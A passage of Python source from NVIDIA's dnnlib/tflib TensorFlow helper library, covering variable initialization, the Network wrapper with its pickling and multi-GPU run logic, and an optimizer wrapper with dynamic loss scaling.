assert_tf_initialized() if target_vars is None: target_vars = tf.global_variables() test_vars = [] test_ops = [] with tf.control_dependencies(None): # ignore surrounding control_dependencies for var in target_vars: assert is_tf_expression(var) try: tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/IsVariableInitialized:0")) except KeyError: # Op does not exist => variable may be uninitialized. test_vars.append(var) with absolute_name_scope(var.name.split(":")[0]): test_ops.append(tf.is_variable_initialized(var)) init_vars = [var for var, inited in zip(test_vars, run(test_ops)) if not inited] run([var.initializer for var in init_vars]) def set_vars(var_to_value_dict: dict) -> None: """Set the values of given tf.Variables. 
Equivalent to the following, but more efficient and does not bloat the tf graph: tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()] """ assert_tf_initialized() ops = [] feed_dict = {} for var, value in var_to_value_dict.items(): assert is_tf_expression(var) try: setter = tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/setter:0")) # look for existing op except KeyError: with absolute_name_scope(var.name.split(":")[0]): with tf.control_dependencies(None): # ignore surrounding control_dependencies setter = tf.assign(var, tf.placeholder(var.dtype, var.shape, "new_value"), name="setter") # create new setter ops.append(setter) feed_dict[setter.op.inputs[1]] = value run(ops, feed_dict) def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs): """Create tf.Variable with large initial value without bloating the tf graph.""" assert_tf_initialized() assert isinstance(initial_value, np.ndarray) zeros = tf.zeros(initial_value.shape, initial_value.dtype) var = tf.Variable(zeros, *args, **kwargs) set_vars({var: initial_value}) return var def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False): """Convert a minibatch of images from uint8 to float32 with configurable dynamic range. Can be used as an input transformation for Network.run(). """ images = tf.cast(images, tf.float32) if nhwc_to_nchw: images = tf.transpose(images, [0, 3, 1, 2]) return (images - drange[0]) * ((drange[1] - drange[0]) / 255) def convert_images_to_uint8(images, drange=[-1,1], nchw_to_nhwc=False, shrink=1): """Convert a minibatch of images from float32 to uint8 with configurable dynamic range. Can be used as an output transformation for Network.run(). """ images = tf.cast(images, tf.float32) if shrink > 1: ksize = [1, 1, shrink, shrink] images = tf.nn.avg_pool(images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") if nchw_to_nhwc: images = tf.transpose(images, [0, 2, 3, 1]) scale = 255 / (drange[1] - drange[0]) images = images * scale + (0.5 - drange[0] * scale) return tf.saturate_cast(images, tf.uint8) File: dnnlib/tflib/network.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for managing networks.""" import types import inspect import re import uuid import sys import numpy as np import tensorflow as tf from collections import OrderedDict from typing import Any, List, Tuple, Union from . import tfutil from .. import util from .tfutil import TfExpression, TfExpressionEx _import_handlers = [] # Custom import handlers for dealing with legacy data in pickle import. _import_module_src = dict() # Source code for temporary modules created during pickle import. def import_handler(handler_func): """Function decorator for declaring custom import handlers.""" _import_handlers.append(handler_func) return handler_func class Network: """Generic network abstraction. Acts as a convenience wrapper for a parameterized network construction function, providing several utility methods and convenient access to the inputs/outputs/weights. Network objects can be safely pickled and unpickled for long-term archival purposes. 
The pickling works reliably as long as the underlying network construction function is defined in a standalone Python module that has no side effects or application-specific imports. Args: name: Network name. Used to select TensorFlow name and variable scopes. func_name: Fully qualified name of the underlying network construction function, or a top-level function object. static_kwargs: Keyword arguments to be passed in to the network construction function. Attributes: name: User-specified name, defaults to build func name if None. scope: Unique TensorFlow scope containing template graph and variables, derived from the user-specified name. static_kwargs: Arguments passed to the user-supplied build func. components: Container for sub-networks. Passed to the build func, and retained between calls. num_inputs: Number of input tensors. num_outputs: Number of output tensors. input_shapes: Input tensor shapes (NC or NCHW), including minibatch dimension. output_shapes: Output tensor shapes (NC or NCHW), including minibatch dimension. input_shape: Short-hand for input_shapes[0]. output_shape: Short-hand for output_shapes[0]. input_templates: Input placeholders in the template graph. output_templates: Output tensors in the template graph. input_names: Name string for each input. output_names: Name string for each output. own_vars: Variables defined by this network (local_name => var), excluding sub-networks. vars: All variables (local_name => var). trainables: All trainable variables (local_name => var). var_global_to_local: Mapping from variable global names to local names. """ def __init__(self, name: str = None, func_name: Any = None, **static_kwargs): tfutil.assert_tf_initialized() assert isinstance(name, str) or name is None assert func_name is not None assert isinstance(func_name, str) or util.is_top_level_function(func_name) assert util.is_pickleable(static_kwargs) self._init_fields() self.name = name self.static_kwargs = util.EasyDict(static_kwargs) # Locate the user-specified network build function. if util.is_top_level_function(func_name): func_name = util.get_top_level_function_name(func_name) module, self._build_func_name = util.get_module_from_obj_name(func_name) self._build_func = util.get_obj_from_module(module, self._build_func_name) assert callable(self._build_func) # Dig up source code for the module containing the build function. self._build_module_src = _import_module_src.get(module, None) if self._build_module_src is None: self._build_module_src = inspect.getsource(module) # Init TensorFlow graph. self._init_graph() self.reset_own_vars() def _init_fields(self) -> None: self.name = None self.scope = None self.static_kwargs = util.EasyDict() self.components = util.EasyDict() self.num_inputs = 0 self.num_outputs = 0 self.input_shapes = [[]] self.output_shapes = [[]] self.input_shape = [] self.output_shape = [] self.input_templates = [] self.output_templates = [] self.input_names = [] self.output_names = [] self.own_vars = OrderedDict() self.vars = OrderedDict() self.trainables = OrderedDict() self.var_global_to_local = OrderedDict() self._build_func = None # User-supplied build function that constructs the network. self._build_func_name = None # Name of the build function. self._build_module_src = None # Full source code of the module containing the build function. self._run_cache = dict() # Cached graph data for Network.run(). def _init_graph(self) -> None: # Collect inputs. 
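        # Network inputs are the build function's positional parameters that have no
        # default value; parameters with defaults are supplied through the build kwargs
        # (static_kwargs, components, etc.) rather than treated as input tensors.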
self.input_names = [] for param in inspect.signature(self._build_func).parameters.values(): if param.kind == param.POSITIONAL_OR_KEYWORD and param.default is param.empty: self.input_names.append(param.name) self.num_inputs = len(self.input_names) assert self.num_inputs >= 1 # Choose name and scope. if self.name is None: self.name = self._build_func_name assert re.match("^[A-Za-z0-9_.\\-]*$", self.name) with tf.name_scope(None): self.scope = tf.get_default_graph().unique_name(self.name, mark_as_used=True) # Finalize build func kwargs. build_kwargs = dict(self.static_kwargs) build_kwargs["is_template_graph"] = True build_kwargs["components"] = self.components # Build template graph. with tfutil.absolute_variable_scope(self.scope, reuse=tf.AUTO_REUSE), tfutil.absolute_name_scope(self.scope): # ignore surrounding scopes assert tf.get_variable_scope().name == self.scope assert tf.get_default_graph().get_name_scope() == self.scope with tf.control_dependencies(None): # ignore surrounding control dependencies self.input_templates = [tf.placeholder(tf.float32, name=name) for name in self.input_names] out_expr = self._build_func(*self.input_templates, **build_kwargs) # Collect outputs. assert tfutil.is_tf_expression(out_expr) or isinstance(out_expr, tuple) self.output_templates = [out_expr] if tfutil.is_tf_expression(out_expr) else list(out_expr) self.num_outputs = len(self.output_templates) assert self.num_outputs >= 1 assert all(tfutil.is_tf_expression(t) for t in self.output_templates) # Perform sanity checks. if any(t.shape.ndims is None for t in self.input_templates): raise ValueError("Network input shapes not defined. Please call x.set_shape() for each input.") if any(t.shape.ndims is None for t in self.output_templates): raise ValueError("Network output shapes not defined. Please call x.set_shape() where applicable.") if any(not isinstance(comp, Network) for comp in self.components.values()): raise ValueError("Components of a Network must be Networks themselves.") if len(self.components) != len(set(comp.name for comp in self.components.values())): raise ValueError("Components of a Network must have unique names.") # List inputs and outputs. self.input_shapes = [tfutil.shape_to_list(t.shape) for t in self.input_templates] self.output_shapes = [tfutil.shape_to_list(t.shape) for t in self.output_templates] self.input_shape = self.input_shapes[0] self.output_shape = self.output_shapes[0] self.output_names = [t.name.split("/")[-1].split(":")[0] for t in self.output_templates] # List variables. 
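        # Variables created under this network's scope are keyed by their local name
        # (global name with the scope prefix and ":0" suffix stripped); sub-network
        # variables are merged in under "<component_name>/...", and a reverse
        # global-to-local mapping is kept for get_var_local_name()/find_var().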
self.own_vars = OrderedDict((var.name[len(self.scope) + 1:].split(":")[0], var) for var in tf.global_variables(self.scope + "/")) self.vars = OrderedDict(self.own_vars) self.vars.update((comp.name + "/" + name, var) for comp in self.components.values() for name, var in comp.vars.items()) self.trainables = OrderedDict((name, var) for name, var in self.vars.items() if var.trainable) self.var_global_to_local = OrderedDict((var.name.split(":")[0], name) for name, var in self.vars.items()) def reset_own_vars(self) -> None: """Re-initialize all variables of this network, excluding sub-networks.""" tfutil.run([var.initializer for var in self.own_vars.values()]) def reset_vars(self) -> None: """Re-initialize all variables of this network, including sub-networks.""" tfutil.run([var.initializer for var in self.vars.values()]) def reset_trainables(self) -> None: """Re-initialize all trainable variables of this network, including sub-networks.""" tfutil.run([var.initializer for var in self.trainables.values()]) def get_output_for(self, *in_expr: TfExpression, return_as_list: bool = False, **dynamic_kwargs) -> Union[TfExpression, List[TfExpression]]: """Construct TensorFlow expression(s) for the output(s) of this network, given the input expression(s).""" assert len(in_expr) == self.num_inputs assert not all(expr is None for expr in in_expr) # Finalize build func kwargs. build_kwargs = dict(self.static_kwargs) build_kwargs.update(dynamic_kwargs) build_kwargs["is_template_graph"] = False build_kwargs["components"] = self.components # Build TensorFlow graph to evaluate the network. with tfutil.absolute_variable_scope(self.scope, reuse=True), tf.name_scope(self.name): assert tf.get_variable_scope().name == self.scope valid_inputs = [expr for expr in in_expr if expr is not None] final_inputs = [] for expr, name, shape in zip(in_expr, self.input_names, self.input_shapes): if expr is not None: expr = tf.identity(expr, name=name) else: expr = tf.zeros([tf.shape(valid_inputs[0])[0]] + shape[1:], name=name) final_inputs.append(expr) out_expr = self._build_func(*final_inputs, **build_kwargs) # Propagate input shapes back to the user-specified expressions. for expr, final in zip(in_expr, final_inputs): if isinstance(expr, tf.Tensor): expr.set_shape(final.shape) # Express outputs in the desired format. assert tfutil.is_tf_expression(out_expr) or isinstance(out_expr, tuple) if return_as_list: out_expr = [out_expr] if tfutil.is_tf_expression(out_expr) else list(out_expr) return out_expr def get_var_local_name(self, var_or_global_name: Union[TfExpression, str]) -> str: """Get the local name of a given variable, without any surrounding name scopes.""" assert tfutil.is_tf_expression(var_or_global_name) or isinstance(var_or_global_name, str) global_name = var_or_global_name if isinstance(var_or_global_name, str) else var_or_global_name.name return self.var_global_to_local[global_name] def find_var(self, var_or_local_name: Union[TfExpression, str]) -> TfExpression: """Find variable by local or global name.""" assert tfutil.is_tf_expression(var_or_local_name) or isinstance(var_or_local_name, str) return self.vars[var_or_local_name] if isinstance(var_or_local_name, str) else var_or_local_name def get_var(self, var_or_local_name: Union[TfExpression, str]) -> np.ndarray: """Get the value of a given variable as NumPy array. 
Note: This method is very inefficient -- prefer to use tflib.run(list_of_vars) whenever possible.""" return self.find_var(var_or_local_name).eval() def set_var(self, var_or_local_name: Union[TfExpression, str], new_value: Union[int, float, np.ndarray]) -> None: """Set the value of a given variable based on the given NumPy array. Note: This method is very inefficient -- prefer to use tflib.set_vars() whenever possible.""" tfutil.set_vars({self.find_var(var_or_local_name): new_value}) def __getstate__(self) -> dict: """Pickle export.""" state = dict() state["version"] = 3 state["name"] = self.name state["static_kwargs"] = dict(self.static_kwargs) state["components"] = dict(self.components) state["build_module_src"] = self._build_module_src state["build_func_name"] = self._build_func_name state["variables"] = list(zip(self.own_vars.keys(), tfutil.run(list(self.own_vars.values())))) return state def __setstate__(self, state: dict) -> None: """Pickle import.""" # pylint: disable=attribute-defined-outside-init tfutil.assert_tf_initialized() self._init_fields() # Execute custom import handlers. for handler in _import_handlers: state = handler(state) # Set basic fields. assert state["version"] in [2, 3] self.name = state["name"] self.static_kwargs = util.EasyDict(state["static_kwargs"]) self.components = util.EasyDict(state.get("components", {})) self._build_module_src = state["build_module_src"] self._build_func_name = state["build_func_name"] # Create temporary module from the imported source code. module_name = "_tflib_network_import_" + uuid.uuid4().hex module = types.ModuleType(module_name) sys.modules[module_name] = module _import_module_src[module] = self._build_module_src exec(self._build_module_src, module.__dict__) # pylint: disable=exec-used # Locate network build function in the temporary module. self._build_func = util.get_obj_from_module(module, self._build_func_name) assert callable(self._build_func) # Init TensorFlow graph. 
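        # Rebuild the template graph from the freshly imported build function, then
        # restore the pickled variable values in a single batched set_vars() call.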
self._init_graph() self.reset_own_vars() tfutil.set_vars({self.find_var(name): value for name, value in state["variables"]}) def clone(self, name: str = None, **new_static_kwargs) -> "Network": """Create a clone of this network with its own copy of the variables.""" # pylint: disable=protected-access net = object.__new__(Network) net._init_fields() net.name = name if name is not None else self.name net.static_kwargs = util.EasyDict(self.static_kwargs) net.static_kwargs.update(new_static_kwargs) net._build_module_src = self._build_module_src net._build_func_name = self._build_func_name net._build_func = self._build_func net._init_graph() net.copy_vars_from(self) return net def copy_own_vars_from(self, src_net: "Network") -> None: """Copy the values of all variables from the given network, excluding sub-networks.""" names = [name for name in self.own_vars.keys() if name in src_net.own_vars] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def copy_vars_from(self, src_net: "Network") -> None: """Copy the values of all variables from the given network, including sub-networks.""" names = [name for name in self.vars.keys() if name in src_net.vars] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def copy_trainables_from(self, src_net: "Network") -> None: """Copy the values of all trainable variables from the given network, including sub-networks.""" names = [name for name in self.trainables.keys() if name in src_net.trainables] tfutil.set_vars(tfutil.run({self.vars[name]: src_net.vars[name] for name in names})) def convert(self, new_func_name: str, new_name: str = None, **new_static_kwargs) -> "Network": """Create new network with the given parameters, and copy all variables from this network.""" if new_name is None: new_name = self.name static_kwargs = dict(self.static_kwargs) static_kwargs.update(new_static_kwargs) net = Network(name=new_name, func_name=new_func_name, **static_kwargs) net.copy_vars_from(self) return net def setup_as_moving_average_of(self, src_net: "Network", beta: TfExpressionEx = 0.99, beta_nontrainable: TfExpressionEx = 0.0) -> tf.Operation: """Construct a TensorFlow op that updates the variables of this network to be slightly closer to those of the given network.""" with tfutil.absolute_name_scope(self.scope + "/_MovingAvg"): ops = [] for name, var in self.vars.items(): if name in src_net.vars: cur_beta = beta if name in self.trainables else beta_nontrainable new_value = tfutil.lerp(src_net.vars[name], var, cur_beta) ops.append(var.assign(new_value)) return tf.group(*ops) def run(self, *in_arrays: Tuple[Union[np.ndarray, None], ...], input_transform: dict = None, output_transform: dict = None, return_as_list: bool = False, print_progress: bool = False, minibatch_size: int = None, num_gpus: int = 1, assume_frozen: bool = False, **dynamic_kwargs) -> Union[np.ndarray, Tuple[np.ndarray, ...], List[np.ndarray]]: """Run this network for the given NumPy array(s), and return the output(s) as NumPy array(s). Args: input_transform: A dict specifying a custom transformation to be applied to the input tensor(s) before evaluating the network. The dict must contain a 'func' field that points to a top-level function. The function is called with the input TensorFlow expression(s) as positional arguments. Any remaining fields of the dict will be passed in as kwargs. output_transform: A dict specifying a custom transformation to be applied to the output tensor(s) after evaluating the network. 
The dict must contain a 'func' field that points to a top-level function. The function is called with the output TensorFlow expression(s) as positional arguments. Any remaining fields of the dict will be passed in as kwargs. return_as_list: True = return a list of NumPy arrays, False = return a single NumPy array, or a tuple if there are multiple outputs. print_progress: Print progress to the console? Useful for very large input arrays. minibatch_size: Maximum minibatch size to use, None = disable batching. num_gpus: Number of GPUs to use. assume_frozen: Improve multi-GPU performance by assuming that the trainable parameters will remain changed between calls. dynamic_kwargs: Additional keyword arguments to be passed into the network build function. """ assert len(in_arrays) == self.num_inputs assert not all(arr is None for arr in in_arrays) assert input_transform is None or util.is_top_level_function(input_transform["func"]) assert output_transform is None or util.is_top_level_function(output_transform["func"]) output_transform, dynamic_kwargs = _handle_legacy_output_transforms(output_transform, dynamic_kwargs) num_items = in_arrays[0].shape[0] if minibatch_size is None: minibatch_size = num_items # Construct unique hash key from all arguments that affect the TensorFlow graph. key = dict(input_transform=input_transform, output_transform=output_transform, num_gpus=num_gpus, assume_frozen=assume_frozen, dynamic_kwargs=dynamic_kwargs) def unwind_key(obj): if isinstance(obj, dict): return [(key, unwind_key(value)) for key, value in sorted(obj.items())] if callable(obj): return util.get_top_level_function_name(obj) return obj key = repr(unwind_key(key)) # Build graph. if key not in self._run_cache: with tfutil.absolute_name_scope(self.scope + "/_Run"), tf.control_dependencies(None): with tf.device("/cpu:0"): in_expr = [tf.placeholder(tf.float32, name=name) for name in self.input_names] in_split = list(zip(*[tf.split(x, num_gpus) for x in in_expr])) out_split = [] for gpu in range(num_gpus): with tf.device("/gpu:%d" % gpu): net_gpu = self.clone() if assume_frozen else self in_gpu = in_split[gpu] if input_transform is not None: in_kwargs = dict(input_transform) in_gpu = in_kwargs.pop("func")(*in_gpu, **in_kwargs) in_gpu = [in_gpu] if tfutil.is_tf_expression(in_gpu) else list(in_gpu) assert len(in_gpu) == self.num_inputs out_gpu = net_gpu.get_output_for(*in_gpu, return_as_list=True, **dynamic_kwargs) if output_transform is not None: out_kwargs = dict(output_transform) out_gpu = out_kwargs.pop("func")(*out_gpu, **out_kwargs) out_gpu = [out_gpu] if tfutil.is_tf_expression(out_gpu) else list(out_gpu) assert len(out_gpu) == self.num_outputs out_split.append(out_gpu) with tf.device("/cpu:0"): out_expr = [tf.concat(outputs, axis=0) for outputs in zip(*out_split)] self._run_cache[key] = in_expr, out_expr # Run minibatches. in_expr, out_expr = self._run_cache[key] out_arrays = [np.empty([num_items] + tfutil.shape_to_list(expr.shape)[1:], expr.dtype.name) for expr in out_expr] for mb_begin in range(0, num_items, minibatch_size): if print_progress: print("\r%d / %d" % (mb_begin, num_items), end="") mb_end = min(mb_begin + minibatch_size, num_items) mb_num = mb_end - mb_begin mb_in = [src[mb_begin : mb_end] if src is not None else np.zeros([mb_num] + shape[1:]) for src, shape in zip(in_arrays, self.input_shapes)] mb_out = tf.get_default_session().run(out_expr, dict(zip(in_expr, mb_in))) for dst, src in zip(out_arrays, mb_out): dst[mb_begin: mb_end] = src # Done. 
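        # Print the final progress line and collapse the output list into a single array
        # (or a tuple for multi-output networks) unless return_as_list was requested.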
if print_progress: print("\r%d / %d" % (num_items, num_items)) if not return_as_list: out_arrays = out_arrays[0] if len(out_arrays) == 1 else tuple(out_arrays) return out_arrays def list_ops(self) -> List[TfExpression]: include_prefix = self.scope + "/" exclude_prefix = include_prefix + "_" ops = tf.get_default_graph().get_operations() ops = [op for op in ops if op.name.startswith(include_prefix)] ops = [op for op in ops if not op.name.startswith(exclude_prefix)] return ops def list_layers(self) -> List[Tuple[str, TfExpression, List[TfExpression]]]: """Returns a list of (layer_name, output_expr, trainable_vars) tuples corresponding to individual layers of the network. Mainly intended to be used for reporting.""" layers = [] def recurse(scope, parent_ops, parent_vars, level): # Ignore specific patterns. if any(p in scope for p in ["/Shape", "/strided_slice", "/Cast", "/concat", "/Assign"]): return # Filter ops and vars by scope. global_prefix = scope + "/" local_prefix = global_prefix[len(self.scope) + 1:] cur_ops = [op for op in parent_ops if op.name.startswith(global_prefix) or op.name == global_prefix[:-1]] cur_vars = [(name, var) for name, var in parent_vars if name.startswith(local_prefix) or name == local_prefix[:-1]] if not cur_ops and not cur_vars: return # Filter out all ops related to variables. for var in [op for op in cur_ops if op.type.startswith("Variable")]: var_prefix = var.name + "/" cur_ops = [op for op in cur_ops if not op.name.startswith(var_prefix)] # Scope does not contain ops as immediate children => recurse deeper. contains_direct_ops = any("/" not in op.name[len(global_prefix):] and op.type != "Identity" for op in cur_ops) if (level == 0 or not contains_direct_ops) and (len(cur_ops) + len(cur_vars)) > 1: visited = set() for rel_name in [op.name[len(global_prefix):] for op in cur_ops] + [name[len(local_prefix):] for name, _var in cur_vars]: token = rel_name.split("/")[0] if token not in visited: recurse(global_prefix + token, cur_ops, cur_vars, level + 1) visited.add(token) return # Report layer. 
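            # Emit one (layer_name, output_expr, trainable_vars) tuple for this scope,
            # using the last op's output (or the last variable) as the representative output.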
layer_name = scope[len(self.scope) + 1:] layer_output = cur_ops[-1].outputs[0] if cur_ops else cur_vars[-1][1] layer_trainables = [var for _name, var in cur_vars if var.trainable] layers.append((layer_name, layer_output, layer_trainables)) recurse(self.scope, self.list_ops(), list(self.vars.items()), 0) return layers def print_layers(self, title: str = None, hide_layers_with_no_params: bool = False) -> None: """Print a summary table of the network structure.""" rows = [[title if title is not None else self.name, "Params", "OutputShape", "WeightShape"]] rows += [["---"] * 4] total_params = 0 for layer_name, layer_output, layer_trainables in self.list_layers(): num_params = sum(np.prod(tfutil.shape_to_list(var.shape)) for var in layer_trainables) weights = [var for var in layer_trainables if var.name.endswith("/weight:0")] weights.sort(key=lambda x: len(x.name)) if len(weights) == 0 and len(layer_trainables) == 1: weights = layer_trainables total_params += num_params if not hide_layers_with_no_params or num_params != 0: num_params_str = str(num_params) if num_params > 0 else "-" output_shape_str = str(layer_output.shape) weight_shape_str = str(weights[0].shape) if len(weights) >= 1 else "-" rows += [[layer_name, num_params_str, output_shape_str, weight_shape_str]] rows += [["---"] * 4] rows += [["Total", str(total_params), "", ""]] widths = [max(len(cell) for cell in column) for column in zip(*rows)] print() for row in rows: print(" ".join(cell + " " * (width - len(cell)) for cell, width in zip(row, widths))) print() def setup_weight_histograms(self, title: str = None) -> None: """Construct summary ops to include histograms of all trainable parameters in TensorBoard.""" if title is None: title = self.name with tf.name_scope(None), tf.device(None), tf.control_dependencies(None): for local_name, var in self.trainables.items(): if "/" in local_name: p = local_name.split("/") name = title + "_" + p[-1] + "/" + "_".join(p[:-1]) else: name = title + "_toplevel/" + local_name tf.summary.histogram(name, var) #---------------------------------------------------------------------------- # Backwards-compatible emulation of legacy output transformation in Network.run(). 
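# For example, a legacy call such as
#     images = Gs.run(latents, labels, out_mul=127.5, out_add=127.5, out_dtype=np.uint8)
# ('Gs' being an illustrative Network instance) is detected below, a one-time deprecation
# warning is printed, and the legacy kwargs are repackaged into
# output_transform=dict(func=_legacy_output_transform_func, ...). New code should pass
# output_transform=dict(func=tflib.convert_images_to_uint8) directly instead.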
_print_legacy_warning = True def _handle_legacy_output_transforms(output_transform, dynamic_kwargs): global _print_legacy_warning legacy_kwargs = ["out_mul", "out_add", "out_shrink", "out_dtype"] if not any(kwarg in dynamic_kwargs for kwarg in legacy_kwargs): return output_transform, dynamic_kwargs if _print_legacy_warning: _print_legacy_warning = False print() print("WARNING: Old-style output transformations in Network.run() are deprecated.") print("Consider using 'output_transform=dict(func=tflib.convert_images_to_uint8)'") print("instead of 'out_mul=127.5, out_add=127.5, out_dtype=np.uint8'.") print() assert output_transform is None new_kwargs = dict(dynamic_kwargs) new_transform = {kwarg: new_kwargs.pop(kwarg) for kwarg in legacy_kwargs if kwarg in dynamic_kwargs} new_transform["func"] = _legacy_output_transform_func return new_transform, new_kwargs def _legacy_output_transform_func(*expr, out_mul=1.0, out_add=0.0, out_shrink=1, out_dtype=None): if out_mul != 1.0: expr = [x * out_mul for x in expr] if out_add != 0.0: expr = [x + out_add for x in expr] if out_shrink > 1: ksize = [1, 1, out_shrink, out_shrink] expr = [tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") for x in expr] if out_dtype is not None: if tf.as_dtype(out_dtype).is_integer: expr = [tf.round(x) for x in expr] expr = [tf.saturate_cast(x, out_dtype) for x in expr] return expr File: dnnlib/tflib/optimizer.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper wrapper for a Tensorflow optimizer.""" import numpy as np import tensorflow as tf from collections import OrderedDict from typing import List, Union from . import autosummary from . import tfutil from .. import util from .tfutil import TfExpression, TfExpressionEx try: # TensorFlow 1.13 from tensorflow.python.ops import nccl_ops except: # Older TensorFlow versions import tensorflow.contrib.nccl as nccl_ops class Optimizer: """A Wrapper for tf.train.Optimizer. Automatically takes care of: - Gradient averaging for multi-GPU training. - Dynamic loss scaling and typecasts for FP16 training. - Ignoring corrupted gradients that contain NaNs/Infs. - Reporting statistics. - Well-chosen default settings. """ def __init__(self, name: str = "Train", tf_optimizer: str = "tf.train.AdamOptimizer", learning_rate: TfExpressionEx = 0.001, use_loss_scaling: bool = False, loss_scaling_init: float = 64.0, loss_scaling_inc: float = 0.0005, loss_scaling_dec: float = 1.0, **kwargs): # Init fields. self.name = name self.learning_rate = tf.convert_to_tensor(learning_rate) self.id = self.name.replace("/", ".") self.scope = tf.get_default_graph().unique_name(self.id) self.optimizer_class = util.get_obj_by_name(tf_optimizer) self.optimizer_kwargs = dict(kwargs) self.use_loss_scaling = use_loss_scaling self.loss_scaling_init = loss_scaling_init self.loss_scaling_inc = loss_scaling_inc self.loss_scaling_dec = loss_scaling_dec self._grad_shapes = None # [shape, ...] self._dev_opt = OrderedDict() # device => optimizer self._dev_grads = OrderedDict() # device => [[(grad, var), ...], ...] 
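        # The per-device dicts above and below are populated by register_gradients()
        # (called once per GPU tower) and consumed by apply_updates(), which averages the
        # gradients across devices and builds the final training op.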
self._dev_ls_var = OrderedDict() # device => variable (log2 of loss scaling factor) self._updates_applied = False def register_gradients(self, loss: TfExpression, trainable_vars: Union[List, dict]) -> None: """Register the gradients of the given loss function with respect to the given variables. Intended to be called once per GPU.""" assert not self._updates_applied # Validate arguments. if isinstance(trainable_vars, dict): trainable_vars = list(trainable_vars.values()) # allow passing in Network.trainables as vars assert isinstance(trainable_vars, list) and len(trainable_vars) >= 1 assert all(tfutil.is_tf_expression(expr) for expr in trainable_vars + [loss]) if self._grad_shapes is None: self._grad_shapes = [tfutil.shape_to_list(var.shape) for var in trainable_vars] assert len(trainable_vars) == len(self._grad_shapes) assert all(tfutil.shape_to_list(var.shape) == var_shape for var, var_shape in zip(trainable_vars, self._grad_shapes)) dev = loss.device assert all(var.device == dev for var in trainable_vars) # Register device and compute gradients. with tf.name_scope(self.id + "_grad"), tf.device(dev): if dev not in self._dev_opt: opt_name = self.scope.replace("/", "_") + "_opt%d" % len(self._dev_opt) assert callable(self.optimizer_class) self._dev_opt[dev] = self.optimizer_class(name=opt_name, learning_rate=self.learning_rate, **self.optimizer_kwargs) self._dev_grads[dev] = [] loss = self.apply_loss_scaling(tf.cast(loss, tf.float32)) grads = self._dev_opt[dev].compute_gradients(loss, trainable_vars, gate_gradients=tf.train.Optimizer.GATE_NONE) # disable gating to reduce memory usage grads = [(g, v) if g is not None else (tf.zeros_like(v), v) for g, v in grads] # replace disconnected gradients with zeros self._dev_grads[dev].append(grads) def apply_updates(self) -> tf.Operation: """Construct training op to update the registered variables based on their gradients.""" tfutil.assert_tf_initialized() assert not self._updates_applied self._updates_applied = True devices = list(self._dev_grads.keys()) total_grads = sum(len(grads) for grads in self._dev_grads.values()) assert len(devices) >= 1 and total_grads >= 1 ops = [] with tfutil.absolute_name_scope(self.scope): # Cast gradients to FP32 and calculate partial sum within each device. dev_grads = OrderedDict() # device => [(grad, var), ...] for dev_idx, dev in enumerate(devices): with tf.name_scope("ProcessGrads%d" % dev_idx), tf.device(dev): sums = [] for gv in zip(*self._dev_grads[dev]): assert all(v is gv[0][1] for g, v in gv) g = [tf.cast(g, tf.float32) for g, v in gv] g = g[0] if len(g) == 1 else tf.add_n(g) sums.append((g, gv[0][1])) dev_grads[dev] = sums # Sum gradients across devices. if len(devices) > 1: with tf.name_scope("SumAcrossGPUs"), tf.device(None): for var_idx, grad_shape in enumerate(self._grad_shapes): g = [dev_grads[dev][var_idx][0] for dev in devices] if np.prod(grad_shape): # nccl does not support zero-sized tensors g = nccl_ops.all_sum(g) for dev, gg in zip(devices, g): dev_grads[dev][var_idx] = (gg, dev_grads[dev][var_idx][1]) # Apply updates separately on each device. for dev_idx, (dev, grads) in enumerate(dev_grads.items()): with tf.name_scope("ApplyGrads%d" % dev_idx), tf.device(dev): # Scale gradients as needed. if self.use_loss_scaling or total_grads > 1: with tf.name_scope("Scale"): coef = tf.constant(np.float32(1.0 / total_grads), name="coef") coef = self.undo_loss_scaling(coef) grads = [(g * coef, v) for g, v in grads] # Check for overflows. 
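                    # grad_ok is True only if every element of every gradient on this
                    # device is finite; when NaNs/Infs are detected, the weight update
                    # below is skipped and, if loss scaling is enabled, the scaling
                    # factor is decreased.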
with tf.name_scope("CheckOverflow"): grad_ok = tf.reduce_all(tf.stack([tf.reduce_all(tf.is_finite(g)) for g, v in grads])) # Update weights and adjust loss scaling. with tf.name_scope("UpdateWeights"): # pylint: disable=cell-var-from-loop opt = self._dev_opt[dev] ls_var = self.get_loss_scaling_var(dev) if not self.use_loss_scaling: ops.append(tf.cond(grad_ok, lambda: opt.apply_gradients(grads), tf.no_op)) else: ops.append(tf.cond(grad_ok, lambda: tf.group(tf.assign_add(ls_var, self.loss_scaling_inc), opt.apply_gradients(grads)), lambda: tf.group(tf.assign_sub(ls_var, self.loss_scaling_dec)))) # Report statistics on the last device. if dev == devices[-1]: with tf.name_scope("Statistics"): ops.append(autosummary.autosummary(self.id + "/learning_rate", self.learning_rate)) ops.append(autosummary.autosummary(self.id + "/overflow_frequency", tf.where(grad_ok, 0, 1))) if self.use_loss_scaling: ops.append(autosummary.autosummary(self.id + "/loss_scaling_log2", ls_var)) # Initialize variables and group everything into a single op. self.reset_optimizer_state() tfutil.init_uninitialized_vars(list(self._dev_ls_var.values())) return tf.group(*ops, name="TrainingOp") def reset_optimizer_state(self) -> None: """Reset internal state of the underlying optimizer.""" tfutil.assert_tf_initialized() tfutil.run([var.initializer for opt in self._dev_opt.values() for var in opt.variables()]) def get_loss_scaling_var(self, device: str) -> Union[tf.Variable, None]: """Get or create variable representing log2 of the current dynamic loss scaling factor.""" if not self.use_loss_scaling: return None if device not in self._dev_ls_var: with tfutil.absolute_name_scope(self.scope + "/LossScalingVars"), tf.control_dependencies(None): self._dev_ls_var[device] = 